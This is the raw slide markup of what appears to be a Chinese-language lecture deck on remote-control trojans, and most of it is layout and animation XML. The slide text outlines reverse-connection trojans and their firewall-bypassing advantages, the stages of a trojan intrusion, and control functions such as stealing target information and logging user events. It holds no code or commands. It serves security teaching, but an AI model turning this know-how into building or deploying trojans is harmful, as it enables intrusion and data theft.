          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28678" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1116013" y="1368425"/>
            <a:ext cx="1235075" cy="1439863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28679" name="Text Box 6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1460500" y="3171825"/>
            <a:ext cx="2089150" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>控制端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28680" name="Text Box 7"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5651500" y="3168650"/>
            <a:ext cx="2649538" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>感染木马的主机</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1251336" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3644900"/>
            <a:ext cx="8229600" cy="2540000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>优点：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解决动态</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>地址的问题；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>解决内网地址的问题；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>绕过防火墙的限制；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>缺点：容易暴露控制端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28682" name="AutoShape 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3779838" y="2232025"/>
            <a:ext cx="2232025" cy="360363"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 154846"/>
            </a:avLst>
          </a:prstGeom>
          <a:gradFill rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:srgbClr val="FF6600"/>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg1"/>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28683" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4500563" y="1728788"/>
            <a:ext cx="936625" cy="457200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPct val="50000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" b="1">
                <a:latin typeface="黑体" pitchFamily="2" charset="-122"/>
                <a:ea typeface="黑体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>反弹</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28684" name="Picture 11" descr="1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6588125" y="1871663"/>
            <a:ext cx="1152525" cy="817562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1251340" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5364163" y="1296988"/>
            <a:ext cx="533400" cy="1728787"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2236297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251336">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251336">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125133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5133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1251336">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251336">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125133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5133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1251336">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251336">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125133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25133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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251336">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251336">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251336">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251336">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251340"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251340"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="35" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251340"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251340"/>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nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251336">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251336">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1251336">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="125133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3138" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>远程控制木马的运行步骤</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1243139" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>木马进行网络入侵的过程</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>配置木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>传播木马</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>启动木马 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>建立连接 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcBef>
                <a:spcPct val="40000"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="黑体" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>远程控制</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3260341" y="2411413"/>
            <a:ext cx="5683634" cy="3257550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2988536195"/>
      </p:ext>
    </p:extLst>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43139">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">
                                            <p:txEl>
                                              <p:pRg st="5" end="5"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="1243139">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1" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程控制技术</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="101382" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="627281" y="1251057"/>
            <a:ext cx="8027987" cy="4992087"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马连接建立后，客户端端口和服务器端口之间将会出现一条通道，客户端程序可由这条通道与服务器上的木马程序取得联系，并对其进行远程控制，主要包括：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>获取目标机器信息 </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>记录用户事件</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>远程操作</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18488644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5" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>(1)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 获取目标机器信息</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102406" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="629316" y="1303439"/>
            <a:ext cx="7772400" cy="5053115"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>木马的一个主要功能就是窃取被控端计算机的信息，然后再把这些信息通过网络连接传送到控制端。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>一般来讲，获取目标机器信息的方法就是调用相关的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>API</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
